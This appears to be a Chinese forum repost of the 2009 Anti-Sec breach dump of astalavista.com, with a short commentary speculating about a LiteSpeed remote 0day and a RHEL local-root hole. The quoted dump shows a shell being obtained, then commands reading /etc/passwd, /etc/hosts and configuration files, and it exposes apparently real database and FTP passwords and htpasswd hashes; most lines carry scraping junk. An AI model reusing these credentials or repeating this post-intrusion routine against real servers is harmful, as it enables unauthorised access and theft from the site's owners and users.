里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。2 P. u1 u' F0 k/ s, K
' t6 }0 g- l& G: G3 d7 ~: d: F
[root@front3 ~]# curl -I litespeedtech.com
: b3 x* D4 U8 @, c, O, X$ R# oHTTP/1.1 200 OK/ a. ]5 @& x7 e
Date: Fri, 05 Jun 2009 22:54:51 GMT$ X/ }3 \3 P7 p& {+ z& j
Server: LiteSpeed, ~ W ?3 q8 u+ z; r
4 M' W: U4 V% B" H, G X另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
# _- d5 x5 I+ ] c- O5 G! Y6 ~, @0 v" F$ S, H( T, G' b- X
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
5 T# r2 k9 X6 [' @8 X6 ]/ H2 y7 Z
% J. G; m3 N2 ?- I+ K7 Y1 Q* T* ]1 W# N! N: z6 b" h
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
* A* C2 i( d" `- s% f, Y/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
2 `" k8 J. F7 e) Q; j/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
7 P* {5 {" G U& N\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
$ F5 z2 @; P6 s) m7 S. Y \/ \/ \/ \/ \/ \/ \/7 [0 U$ }" x' [' y# `
The Hacking & Security Community
- Y: G @+ z" u/ y/ E! E* i& b[+] Founded in 1997 by a hacker computer enthusiast
& M8 R5 v2 H, F! t[-] Exposed in 2009 by anti-sec group d" G& I. \# D, w$ {
, a6 Z6 J9 |$ z& k
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:5 a# i& I; ]6 Z
>> 03. Who’s behind the site?
+ a7 N- p2 _' k' D: N7 X- N& D9 S8 C>>
& }5 |. b8 I* G4 w0 k9 C4 w>> A team of security and IT professionals, and a countless number of contributors from all over the world.7 |& \0 p2 d# C1 b- }* o
' d# O+ {: t4 {/ u$ s B% L" s9 C( a
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
4 f1 c! {& ?2 o3 T>>+ H( V) e" ~ a& W
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
9 Z8 R/ k5 B/ C% ]! zmilitary institutions.
. J3 [9 }) H% H! n6 C& T1 K! ^' B& e>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information./ }% {9 T6 d" i7 z
* Z f) S. V3 V: c) |0 K( b; pWhy has Astalavista been targeted?
# g0 p' Z8 D, C+ A* n1 h+ n
; B2 x1 X y; K# [2 E+ M0 r! @2 I: OOther than the fact that they are not doing any of this for the “community” but
$ s7 x) V1 q# q* ~! Ifor the money, they spread exploits for kids, claim to be a security community
) v- K" h4 J% s* U: L# ?& B! r2 K' v(with no real sense of security on their own servers), and they charge you $6.66
3 I( K# B* {) n4 C$ b) t* nper months to access a dead forum with a directory filled with public releases z1 y5 g8 P7 M6 I2 a" c
and outdated / broken services.
& K- v, P2 x E# n
4 V" _' c$ V3 `5 W/ i/ l6 ^1 e3 ZWe wanted to see how good that “team of security and IT professionals” really is.! S2 ^; I+ ^# o, e( S2 ]
3 z( X" X$ s( q. PLet’s begin.
, [, W" w3 a% y" i- D7 G# O7 G. w/ |' u: s
anti-sec:~# ./g0tshell astalavista.com -p 802 P7 V. P% H5 _1 s# w
[+] Connecting to astalavista.com:80* [- L5 l+ D) [2 P
[+] Grabbing banner…
; Y' O) l r- GLiteSpeed4 D& y7 i! h' Y5 ?, t; X
[+] Injecting shellcode…
; x! i2 |9 \* ]/ A[-] Wait for it
$ V! I- r& o" U% C5 p1 k" R# U
* B4 S1 N# h" z& ~[~] We g0tshell$ h5 \+ t/ S" k# m Z# R9 _
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
* x" |. e9 [- F D7 Y! D4 c* K% y5 wID: uid=100(apache) gid=500(apache) groups=500(apache)
# Q; L6 M0 F4 R9 u4 o" S! n7 v! k( t! A' a5 [1 D+ e; d7 i. h
sh-3.2$ cat /etc/passwd( z# H3 |$ b# R; U3 B9 |+ u Q
root:x:0:0:root:/root:/bin/bash6 n) ]3 F8 r1 f) \4 P
bin:x:1:1:bin:/bin:/sbin/nologin% w- t) @9 M o8 n
daemon:x:2:2:daemon:/sbin:/sbin/nologin
. w1 \0 M+ S4 C7 D2 ?5 {- J5 @. {adm:x:3:4:adm:/var/adm:/sbin/nologin
( ?9 N w6 J% e1 ?8 ?lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
5 }) `$ a8 \* W! }9 i5 Esync:x:5:0:sync:/sbin:/bin/sync
0 f v' K6 V# wshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
. j9 v; n4 \5 B6 Rhalt:x:7:0:halt:/sbin:/sbin/halt
% A% t6 J- D0 e5 [& Q4 v. H* W5 U B: bmail:x:8:12:mail:/var/spool/mail:/sbin/nologin7 L3 X& D' k' l6 W- @" A& V* L
news:x:9:13:news:/etc/news:3 q; C- A, H, o
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin; C9 W/ ^, `7 Y% _3 ]
operator:x:11:0 perator:/root:/sbin/nologin
3 d. Q) k7 @* egames:x:12:100:games:/usr/games:/sbin/nologin
[; x; c) P- A9 Ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin7 O( R" @9 s4 `- `3 \ i' v0 R
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
; p$ X2 \/ x% O/ T! f. znobody:x:99:99:Nobody:/:/sbin/nologin2 o0 J' k3 g( Z# V6 f
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
& `2 f! Y! Q. S7 s* U) I4 ddbus:x:81:81:System message bus:/:/sbin/nologin& z i1 V. X/ U3 e* W
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
& j( x( H* R; f5 [mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
, a& j Q2 e: h3 L( _1 E3 xsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin4 V( H( e) N4 _2 d q
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
& h: Y7 g; A: f5 D/ A3 Mhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin% v6 K1 L7 j$ l1 X; [
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
" w$ @6 h/ q) @9 I7 @5 H& Grpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
. n' p; y$ g$ A" V0 I9 h$ anfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin6 Z0 F( r" F4 H- l$ C$ K
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin. Y Q" c1 H* ~0 c
pcap:x:77:77::/var/arpwatch:/sbin/nologin
: } Z% y4 Q2 | z9 u- hnamed:x:25:25:Named:/var/named:/sbin/nologin" G4 X/ i) W/ {3 l/ s
apache:x:100:500::/var/www:/bin/false+ {! T8 [4 Y4 p* z; I k% t
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
6 _4 W6 Y6 R0 a) y, Tmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash/ }- Z% _1 O/ @& ~; e6 M% ^ u& I# V
webapps:x:500:501::/var/www/html:/bin/bash0 ]0 C% V+ a) b) F+ P! P
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
# e& z5 `! d4 x0 m/ g6 m" }admin:x:501:502::/home/admin:/bin/bash
6 Q- l) g p9 kjon:x:502:503::/home/jon:/bin/bash
+ J* q, n. ]- Z, scom:x:503:504::/home/com:/bin/bash: j, ~, f/ C- L$ E% ?+ e
ntp:x:38:38::/etc/ntp:/sbin/nologin
4 O/ ]' [2 t8 F4 P$ Wais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
" c: \ i$ C! @5 ] }$ [8 u- Hastanet:x:504:505::/home/astanet:/bin/bash: n: {0 O$ p5 P9 ` m
avahi:x:70:70:Avahi daemon:/:/sbin/nologin5 K# b/ D2 P8 _" ~- r1 k
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
& @6 s/ A6 d" }. D
r3 {8 i- p8 l5 j" x3 _- `3 a/ e1 c/ [sh-3.2$ cat /etc/hosts
* @5 b* K! J/ m' o: e0 d4 `1 A6 e# Do not remove the following line, or various programs" t1 G0 u, {! a- Z. h
# that require network functionality will fail.
. M+ f/ p6 y: s( l$ {127.0.0.1 localhost.localdomain localhost) G) c \! J6 q) p z1 e
::1 localhost6.localdomain6 localhost6! T U7 g' g2 {* @# M' M
80.74.154.172 asta1.astalavistaserver.com0 ]6 v6 ]$ u( d, L% x- a
0 o; B4 i2 ~: {2 W0 \sh-3.2$ pwd
8 V. j: p, i9 j9 _) c* A, |/home/com/public_html
/ s$ p7 O: j. O" W# C
/ L" Z o% W: d- q! Ksh-3.2$ ls -la
+ h: l/ D, |3 o( P$ ^8 a$ B/ ftotal 18460
" K' b" {: H- b+ W, ?drwxr-xr-x 30 com apache 4096 May 28 17:06 .
8 W# ]2 Q' f5 a- Hdrwx–x–x 11 com com 4096 Jun 25 2008 ..
7 U3 m0 e/ h qdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin# c. F1 Y: |1 m" o/ d$ u
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache1 b- i$ P9 t: a3 H8 G7 V
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin8 |) d: @1 H/ J: y* y3 J8 A& K
drwxrwxrwx 2 com com 4096 May 19 00:50 config" H+ E B, q7 l3 G
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core! B0 t8 K" h$ E. `7 O N
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules' ~' a4 u! e B/ x( t/ i
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
" C# O" t: a5 y' F: vdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo7 \* l% ]+ z1 Y; r: m1 P
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
# l: g) H- t7 D$ [8 N, ^; Z-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
+ f) l( z( P7 y! q0 U) Sdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
M! e! I2 H/ j9 E8 M4 m9 kdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor4 x- E: \3 f1 K
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
, X1 {$ c" `3 W, Adrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
$ x1 W; O. F) q* w-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
! } y* {$ ?5 _) L5 t-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
5 X. z9 f* x `& ~: e, A: P-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
" ~& R. f& V& p( Zdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
) S# h1 H- Q: w9 v1 wdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
+ x. {+ I* d& @+ u- N Q, o! Z( X-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
) M: a5 s: h# M& t/ d! {+ ?* zdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
( o, `" F, d) b# C3 ndrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
" J8 J3 b8 Z6 Ndrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
5 B, T, d6 q# k3 t. v4 \+ v+ ~3 ?drwxrwxrwx 12 com com 4096 Jun 2 07:47 media. W: z8 j% Z5 X( H
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications' R; s. u: |2 V% }8 t- \
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
) }0 J4 V3 u0 r6 t4 odrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin4 i9 q- W" \: ~+ V
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
' }! G+ d( E' v2 k! d/ Jdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
$ B( D' X. ^' g$ Zdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
8 H7 L8 f' K* ^7 \" z1 F4 Cdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy+ p: }7 r3 g3 T5 M
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
8 L, ?, M+ b9 @-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml* H6 Y9 V g5 N7 t' {) d' f0 v) d3 l
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php- V8 _/ |# v) [% H! b4 v% C
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
- |2 A, c0 E6 P$ X& g$ i* Xdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
7 n1 |% h. N/ y+ f& x# q1 y& h( m. Ydrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam6 E( X+ [8 P8 A2 B; x
* }! e% C" X \ q) W, K, Nsh-3.2$ head -20 index.php# E. E( @/ ?( O# t9 u5 x' v
<?php
. c- p1 F7 Z) n6 k
) k: u: d% X" k- d; |* g7 b/**" O' }: ]' k3 a' V8 V2 [7 A+ W
* The main page for the CMS5 C1 K5 R8 X+ S+ N% o; K. \
* @copyright CONTREXX CMS - COMVATION AG
" O3 l6 O; |% A& j# x/ h" u* @author Comvation Development Team2 ^. x3 z& o( A7 S* |0 {2 @
* @version v1.0.9.10.1 stable8 F/ a; O& j" h9 ^
* @package contrexx
2 ^7 W2 [2 S+ \8 a9 e* @subpackage core
0 Q8 k/ K6 M& I' z/ B3 C- z* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
3 Z* X+ B5 `) @# c6 E3 r% P* @since v0.0.0.0
; h5 V0 Z6 P2 N. i& Z Y1 l- f* @todo Capitalize all class names in project
! m8 B; \+ l6 m* @uses /config/configuration.php! x4 ]* g4 z9 @7 S% O9 I- l* X
* @uses /config/settings.php
8 u' h+ a: E) m! K; k. p3 @* @uses /config/version.php. s2 \: y; W" q; Y% d
* @uses /core/API.php) C* R, v! F0 ?! E
* @uses /core_modules/cache/index.class.php
8 N1 f+ U( O+ O: I0 N* @uses /core/error.class.php
8 k8 w% @3 _) z+ ]0 O8 i; @* @uses /core_modules/banner/index.class.php7 m: {/ F4 @/ g
* @uses /core_modules/contact/index.class.php
8 E9 v5 Y6 @' V1 ]% Y2 J- j7 U! |
. T) l( W. z; h5 P3 B# Ksh-3.2$ cd config/
+ D5 ]2 R' O# s8 qsh-3.2$ ls -la \ H. w) `* \8 ?$ o
total 32
+ f/ R8 l7 n9 p- Fdrwxrwxrwx 2 com com 4096 May 19 00:50 .5 J9 F+ {' h- H# s. y7 L
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..1 l1 s$ S8 e* w+ Z
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
# n) X* @7 [" h5 x5 w7 A+ N-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php: A8 s7 b$ M! B% F/ s
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
3 k6 H {: ~/ W' T6 P-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
y5 B) E4 w/ K4 e* b, {& t
r6 k7 r! G' _$ K0 i' Bsh-3.2$ cat configuration.php
( Y& h6 h9 J& O5 F' U# H[snip]
0 x# o+ V$ h- l1 s6 t$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
% m5 N& N9 j3 J |$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name: K$ ] Y# j% S* X+ f# ]% u! J
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
! r. K: M4 N2 c# o6 T$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
- _ F; Z ^" e3 G$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
/ w: T' h% Y3 r$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)) B7 p6 _! q" g
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)) x( G8 d1 I/ s% g- V" k7 K: {
[snip]# K$ ~% {0 | f. H: f& l7 p
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
4 j& y- B/ c& B2 z$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
9 J2 K: B; D; D3 ]$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost: U& U l q* ^% k) R, k
$_FTPCONFIG['port'] = 21; // Ftp remote port$ N6 n! h9 M1 Y/ N
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
0 N" w% z4 A9 m$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
; t+ E+ U* u% c2 ]7 _( [$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
# O3 v1 u+ h7 X) D F+ h& \7 m, U9 B7 ^# N/ ]' S( D& B5 h: _
sh-3.2$ cd ..7 z. z: o, t7 o" @7 S
sh-3.2$ cd dvd/
9 r: |3 w# L% J4 R. J$ y3 P* Ksh-3.2$ ls -la5 B D6 c5 k3 B9 Y9 C$ n
total 2913780
5 g/ b2 s' ~ o, o' zdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
2 D/ S3 U8 ?6 ~! j0 Sdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
4 A7 q$ ~+ @( Y2 h% k-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar% {. l; D( G! k
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar$ {4 x7 d+ b, D* @ g
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar3 i4 M3 y! e7 \; G. \# W/ D0 x
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
# C0 C& Z. W) m9 ^- r0 g
3 x' x3 ?; I% @# f2 |9 M tsh-3.2$ cat .htaccess, ?4 j- B7 }+ E# U E/ ?4 {
authType Basic
- N* y. B- d2 {& `* Z! ~authName DVD$ h- d& s1 P8 E2 z7 p$ n
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd9 U" p! [: g' Q6 E& _" C
require valid-user
( M3 o0 w5 w# h7 i h
7 E1 |# r$ X" ksh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd5 Q" C) H; r& K4 ~, L# T9 I- a, v
DVDdownload:CRD8cuY6.MPT66 `. T( ]+ b$ V+ [
DVDdownload2:CR8a36.wluFMg6 G7 a$ J# X* g% L6 b
# M! t) H3 p' n7 {4 {+ O t
sh-3.2$ cat test.php) y' p. t; Q& r# |6 X! `
<?php4 S0 n& q+ f! p5 N# m
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;2 _$ d) g% _0 l ?9 I
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
( K6 c/ [& t6 i2 j; M) o, recho $url;
0 T1 B' K( }9 L% T?>+ M- K6 q1 n! G ?/ {
. L) f0 S- h" \" C, K# i7 M; _ I
sh-3.2$ cd modifications/
' R) `# @0 K Qsh-3.2$ ls -la% r/ p' c% L; ~+ |/ R
total 32
' }5 z) Q4 z& l! e3 F6 |( c8 udrwxr-xr-x 8 com com 4096 May 11 12:48 .
# q* _& Y, W, B+ E3 R) ydrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
# `# ~3 V/ {; x! ^& @drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng' P, w- h: a ?% k$ w8 L% `0 e
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
6 J6 B% f: g6 V; S& _drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools" z: c# V6 }, \7 h1 X; T
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
* B% I2 _( I3 ^4 t: f0 Xdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search
5 m7 {% B& w6 S+ \: g( tdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp5 @0 G1 G9 x" h4 H# \: |2 Q
0 [) \( z8 V) |& G2 l# l- Y; S
sh-3.2$ ls -R2 u/ o( i7 t1 r( A K; Q
.:
9 u! `; j8 l. v5 ^7 vcom_avtng cronjobs onlinetools pjirc search _tmp
4 ]' m0 b4 W) S# D' T! v. v* C! z6 E% J" k. P. }2 a4 s0 m) y( [. \9 @4 i" X
./com_avtng:4 O% P+ `, ~/ a7 H
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts2 e: ~1 T2 A! r! @2 o
" m: v, w: z% m
./com_avtng/scripts:6 E% w9 R' J% e# |
popunder.js/ a3 C4 L' m; @
. j( g3 b# V, h./cronjobs:4 I9 }. d, Z4 G: I ~& _7 U2 `
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp7 Y, q* t. j7 D
) X1 v5 }9 O5 Q: L0 W./cronjobs/tmp:' U$ P! ]+ M: J4 C2 C# x/ {
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
. O* Z& w% X# `" I- b; {5 }% C
+ I8 g4 Q* I4 e u) d./onlinetools:+ A+ o3 X' r- P8 A: k7 y
index.php, {0 e2 L; a: ?
. S8 I) s* c" I& ?% D: N7 {4 }3 i
./pjirc:$ d& u' j% D. W* O+ Y5 z
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt# y7 N8 L0 W) i; e# X: \
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
. a- H3 H( O! D( R' Nbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
( A! G; Y8 o0 J. E) v3 f
1 N4 t& t7 B9 J* d./pjirc/img:
9 L2 ]9 Z* o2 Dange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif/ Q+ n2 J2 E( E( g: K! W1 z
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
: H% `" E0 q8 T- A) n4 Z; Lverre-eau.gif: V8 G& I6 a9 ~/ a, v9 ]
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
2 B/ M1 q* X7 T! a8 p$ Jverre-vin.gif; k! Q; G: K# z c8 E: U! {; {
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif# K- G0 \. g3 A
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif* f' }' j N4 O0 s+ s
. d6 r5 l& Y; G1 o( M9 w+ h./pjirc/snd:
/ ^2 q7 ? a: O% T3 Abell2.au ding.au4 f4 j0 T E0 q0 Y& N4 d F
* k1 G% Q7 X( _; s./search:: ~+ q+ l( {- C$ T+ `5 }$ N
searchEngines.php search.php
9 @9 o5 F! s; H8 I. W3 I/ o
$ i( c/ B% W8 x5 G1 V2 V./_tmp:
( e% Y$ h% d ddefaultPorts.php defaultPorts.txt
) g+ M) _, @' K5 [" D/ R2 Z8 v. `6 v- j0 ?$ L: X; I' I0 j
sh-3.2$ cd cronjobs/
7 q5 g! C: F) W* q" k4 Ash-3.2$ cat exploits.php) Z: I$ @9 |6 o- t5 N2 `
[snip]
" s4 V2 k0 o& n9 k$categories = array();
9 L# z' c% @: R; M4 G$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
, N3 V, r/ G* a: u% x9 h2 X) B$expolits = file($milw0rmFile);
! K! L7 k5 ]: `4 z# z$comExploits = array();
$ _/ P8 Y0 u2 d6 O- J! {/ R: o4 i[snip]
! l& X( M) E# E2 e. M1 h# Q// manage data' Y& a. p' f/ K+ o* i
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
! k1 D1 g% {: s: {6 Z4 l2 ~
; H" f( l l+ I- Z1 l2 y9 R% x( T // get path and title) u( \' |' [& k1 N3 c e; l
$expolits[$x] = trim($expolits[$x]);" A8 R3 `) A6 s/ N5 N" H
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
+ X# O6 O. z3 t+ L" Q" O $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);" N6 b/ {1 n! ~: V
! F/ D! E+ `2 _) n // check if file exists* m, ^+ p7 I. [5 E0 c8 t4 b6 r% ]
if (file_exists($path)) {
V$ e' B7 L, }4 V/ i# Q6 A* z# _) I. p8 F: y" x/ M
$text = file_get_contents($path);
# @; K9 d& B3 m5 [/ l8 S6 h) Y& z) o8 E, y; a9 X
// get content and date
% F3 T# ?8 b9 A& S: Z2 j) m //$text = htmlspecialchars($text, ENT_QUOTES);
- F3 \# Y3 \' H, O $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));9 ~8 d* l. }; P, ?. S5 p2 I5 t
if ($tmptext != ”) {( u7 ~' |' @5 } I6 Q6 F9 ~) \
$text = $tmptext;$ w5 q/ \ i/ O5 w" u+ ~5 O
} else {
, V0 {" O0 u7 x" ^# a% X8 ^. x $text = addslashes(htmlentities($text, ENT_QUOTES));
5 {7 l8 L* ~8 K0 @( L6 ~7 O }) B% j1 L) W/ P9 m" k
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));1 |' |, p; w) L$ p7 v2 |
$tmp = explode('-', $date);' o! P% ~2 _+ S) [
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
0 r0 k% |7 p/ F $cat = getCategory ($path);
* O0 g: l- Y5 X0 ] $ext = pathinfo(basename($path));
# e4 [/ ^, {. [4 L $ext = $ext['extension'];
' c( |8 ^" R C, r3 b $qStr = ”
# F* m. C9 \; K# e. ` SELECT `id`
+ i: l1 k& O9 ?, w! ` FROM `contrexx_module_exploits`
# _0 m1 `* {5 k7 S) M! Z WHERE `title` = ‘” . $title . “‘
: \. J# t! Z7 A" u2 i0 f3 w AND `date` = ‘” . $date . “‘# K$ v5 G4 X: u* P" }! Y
“;6 b7 i& c# c! w3 v( j& g
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;1 r3 \! l6 t( E) D
$q = $_objDB->query($qStr);
! I; i" N9 w1 b( J' a0 j/ V# T2 n6 U6 G4 c( u/ {/ p' A
if ($q->numRows() == 0) {
) S4 o: H) J) A, c7 d, d4 w+ { h$ O' X) v& ~( E8 l: a Y
// prepare array& k# t) ?4 u$ f
$comExploits[$x]['date'] = $date;
' s2 v+ y3 H% |( v6 }' ~& W $comExploits[$x]['title'] = $title;
5 J6 c" z* _) D' j; u" \ $comExploits[$x]['author'] = ‘milw0rm’;( m7 M7 |) o: d1 `
$comExploits[$x]['text'] = $text;( b9 s4 {% P: ?' |1 s$ J7 p
$comExploits[$x]['source'] = $ext;) A& P- j7 `+ |1 g
$comExploits[$x]['url1'] = ”;
C+ s; B- n) O p' @# l6 x/ E $comExploits[$x]['url2'] = ”;
6 B' F' u; P+ s) m $comExploits[$x]['catid'] = $cat;
5 I, `) G3 ~1 M( _, n $comExploits[$x]['lang'] = ‘2′;
2 j. C& M+ m* Q0 V& v; q4 E/ I $comExploits[$x]['userid'] = ‘12′;1 |- s( v+ ]! x0 z
$comExploits[$x]['startdate'] = ‘0000-00-00′;( d r E: b3 @$ v) X
$comExploits[$x]['enddate'] = ‘0000-00-00′;. \; k( K0 \/ G8 H. J% n
$comExploits[$x]['status'] = ‘1′;( e" z7 S$ w, P) b% O
$comExploits[$x]['changelog'] = $date;
0 U" T \* t' @
* X: V$ c3 i& v! Y" X, P( Y }
1 L! @8 q. }/ }3 n# A( h[snip]
; ~3 y, j% `3 q, p9 k, G! r $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
3 K6 q5 Q, c6 R- U, Q0 T3 ?<rss version=”2.0″>
) N5 T) F! ]+ ~$ B <channel>& q' U! e7 z6 Q* I9 v$ b$ }
<title>ASTALAVISTA.com - Exploits</title>
+ z! R% k1 ]0 Q8 ? <link>http://www.astalavista.com/exploits</link>
